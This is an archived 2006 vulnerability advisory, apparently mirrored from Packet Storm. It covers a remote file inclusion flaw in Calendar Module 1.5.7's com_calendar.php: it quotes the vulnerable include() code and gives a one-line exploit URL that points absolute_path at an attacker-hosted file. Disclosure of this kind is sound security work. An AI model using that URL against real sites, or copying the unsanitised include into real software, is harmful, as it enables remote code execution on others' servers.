Lucene search
K

calendar157.txt

🗓️ 19 Jul 2006 00:00:00Reported by MatdhuleType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Calendar Module 1.5.7 Remote File Include Vulnerabilities. Variables not properly sanitized

Code
`---------------------------------------------------------------------------------  
Calendar Module <= 1.5.7 Remote File Include Vulnerabilities  
---------------------------------------------------------------------------------  
  
Author : Matdhule  
  
Contact : [email protected]  
  
Application : Calendar Module (com_calendar.php)  
  
Version : 1.5.7  
  
---------------------------------------------------------------------------------  
Vulnerability:  
In folder components we found vulnerability script com_calendar.php.  
  
-----------------------com_calendar.php---------------------------------  
<?php  
  
//Configuration  
include($absolute_path.'/components/calendar/cal_config.php');  
if (!file_exists("language/calendar/".$lang."_calendar.php") ) {   
die("Invalid Language");  
} else {   
include($absolute_path.'/language/calendar/'.$lang.'_calendar.php');  
}   
  
-------------------------------------------------------------------------  
  
Variables $absolute_path are not properly sanitized. When register_globals=on  
and allow_fopenurl=on an attacker can exploit this vulnerability with a  
simple php injection script.  
---------------------------------------------------------------------------------  
  
Exploit :  
  
http://[target]/[path]/components/com_calendar.php?absolute_path=http://attacker.com/evil.txt?  
  
---------------------------------------------------------------------------------  
  
Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, phoux, bius, thama & all crews #mardongan, #e-c-h-o, #jambihackerlink @dalnet  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation